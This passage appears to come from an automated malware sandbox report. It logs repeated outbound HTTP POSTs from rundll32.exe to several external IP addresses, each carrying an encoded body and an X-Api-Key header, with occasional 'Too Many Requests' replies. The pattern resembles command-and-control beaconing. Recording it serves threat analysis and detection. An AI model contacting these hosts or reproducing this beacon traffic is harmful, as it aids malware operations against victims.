Jul 15, 2024 12:44:30.486408949 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: iOdzDDeH Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:44:31.088643074 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:44:31 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	54529	195.2.70.38	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:53.526601076 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: nCFTbC0j Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	54530	195.2.70.38	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:53.548861980 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: GitqPfw7 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	54531	91.142.74.28	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:55.294971943 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 0VURecxs Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	54532	91.142.74.28	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:55.307051897 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: YooQl1pJ Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	54533	77.238.224.56	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:57.037718058 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: GxjT7bby Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	54534	77.238.224.56	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:57.058747053 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: NzqoF9Jl Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	54535	77.238.229.63	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:58.672132969 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: LbuzCzmb Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	54536	77.238.229.63	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:58.707135916 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ryxJOUSW Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	54537	77.238.250.123	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:00.274965048 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: EbM5vqR6 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:45:00.870381117 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:45:00 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.7	54538	77.238.250.123	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:00.347341061 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 8Rz6fdYL Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:45:00.979316950 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:45:00 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.7	54539	195.2.70.38	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:01.099924088 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 67WVhNFO Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.7	54540	91.142.74.28	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:02.856184006 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: clTmipXq Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.7	54541	77.238.224.56	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:04.601672888 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: QjbTdKK5 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.7	54542	77.238.229.63	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:06.478851080 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 4PUHSYAp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.7	54543	77.238.250.123	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:08.070478916 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Je4k7bwu Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:45:08.740403891 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:45:08 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.7	54544	195.2.70.38	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:30.979150057 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: XYQMJXKY Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.7	54545	195.2.70.38	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:31.001327991 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: DCrYHSAV Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.7	54546	91.142.74.28	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:32.730792046 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: j5eSdIjW Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.7	54547	91.142.74.28	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:32.743575096 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: nR973R3n Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.7	54548	77.238.224.56	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:45:34.492659092 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: JtN0hgnI Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 